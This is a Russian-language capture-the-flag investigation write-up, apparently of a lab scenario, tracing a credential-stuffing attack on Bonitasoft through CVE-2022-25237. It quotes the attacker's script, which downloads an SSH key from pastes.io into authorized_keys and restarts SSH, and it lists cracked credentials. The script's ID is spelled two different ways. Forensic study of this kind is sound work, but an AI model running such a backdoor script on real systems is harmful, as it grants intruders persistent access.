Сценарий
Forela - это быстро растущая компания, которая использует особую программу для управления своим бизнесом. К сожалению, у нас мало инструкций, и админы не очень хорошо разбираются в безопасности. Мы хотим, чтобы вы, как наш новый защитник, проверили файлы с данными о сети и событиях, чтобы убедиться, что нас не взломали.
Вопросы
- Как называется атакованное приложение?
- Как называется такая брутфорс-атака?
- Привести идентификатор эксплуатированной уязвимости.
- Какую строку атакующий добавлял к API, чтобы обойти фильтрацию?
- Сколько комбинаций
логин + пароль
было применено в атаке? - Какие креды удалось подобрать?
- Какой сайт для обмена текстовыми заметками использовал атакующий?
- Какая хеш-сумма MD5 скрипта, с помощью которого атакующий получил доступ?
- Какая хеш-сумма MD5 публичного ключа атакующего?
- Какой файл модифицировал атакующий для закрепления в системе?
- Привести идентификатор техники закрепления по классификации MITRE.
Расследование
Посмотрим на файл meerkat-alerts.json
. Поиском по CVE
находим идентификатор уязвимости CVE-2022-25237
, а рядом с ним название приложения - Bonitasoft
.
При исследовании видим сайт для обмена текстовыми заметками pastes.io
, который атакующий использовал.
Смотрим в PCAP-файл. Видим обращения на /bonita/loginservice
и находим креды [email protected]:g0vernm3nt
.
Если посмотреть другие запросы к этому эндпоинту, то можно понять, что используется атака credential stuffing
.
Также можно отметить, что комбинаций логин:пароль
было 56
.
Эксплоит использовал i18ntranslation
, чтобы обойти авторизационный фильтр.
Выполненный на атакуемой машине скрипт был загружен с https://pastes.io/raw/5x5gcr0et8
.
#!/bin/bash
curl https://pastes.io/raw/hffgra4unv >> /home/ubuntu/.ssh/authorized_keys
sudo service ssh restart
Скрипт выкачивает из https://pastes.io/raw/hffgra4unv
публичный ключ и добавляет его в список авторизованных ключей пользователя ubuntu
на машине (/home/ubuntu/.ssh/authorized_keys
, после чего перезапускает сервис SSH.
Вычислим MD5 хеш-сумму от публичного ключа и скрипта.
# публичный ключ
$ curl --silent https://pastes.io/raw/hffgra4unv | md5sum | cut -d ' ' -f 1
dbb906628855a433d70025b6692c05e7
# скрипт
$ curl --silent https://pastes.io/raw/bx5gcr0et8 | md5sum | cut -d ' ' -f 1
0dc54416c346584539aa985e9d69a98e
По классификации MITRE идентификатор T1098.004.